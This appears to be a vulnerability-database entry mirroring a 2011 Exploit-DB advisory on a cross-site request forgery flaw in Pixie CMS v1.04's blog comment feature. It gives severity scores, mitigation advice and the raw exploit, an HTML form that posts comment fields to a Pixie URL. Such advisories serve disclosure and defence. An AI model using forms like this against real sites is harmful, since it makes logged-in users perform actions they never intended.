Pixie v1.04 blog post CSRF

vendor:

Pixie CMS

by:

hackme

5.5

CVSS

MEDIUM

Cross-Site Request Forgery

352

CWE

Product Name: Pixie CMS

Affected Version From: 01.04

Affected Version To: 01.04

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Linux Ubuntu 10.10

2011

The Pixie v1.04 blog post feature is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can create a crafted webpage that tricks a logged-in user into submitting a form on behalf of the attacker. This can lead to unauthorized actions being performed by the user without their knowledge or consent.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper CSRF protection measures, such as using anti-CSRF tokens and validating the referrer header.

Source

Exploit-DB raw data:

# Exploit Title: Pixie v1.04 blog post CSRF
# Google Dork: # Date: 11-Dec-2011
# Author: hackme
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip 
# Version: 1.04# Tested on: Linux Ubuntu 10.10
# CVE :
[+] TH4NKZ T0: broiosen,ReGun and hackgame.it
[+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post 
[+] Post Method
[+] exploit:

<form method="POST" action="http://127.0.0.1/pixie/?s=blog&m=permalink&x=my-first-post">
name: <input type="Text" name="name" id="name" size="15"/><br>
e-mail: <input type="Text" name="email" id="email" size="15"/>
<br>web(optional): <input type="Text" name="web" id="web" size="15"/><br>
comment: <input type="Text" name="comment" id="comment" size="15"/><br>
<input type="Submit" name="comment_submit" id="comment_submit" value="invia" size="15"/>
<input type="Hidden" name="post" id="post" value="1"/></form>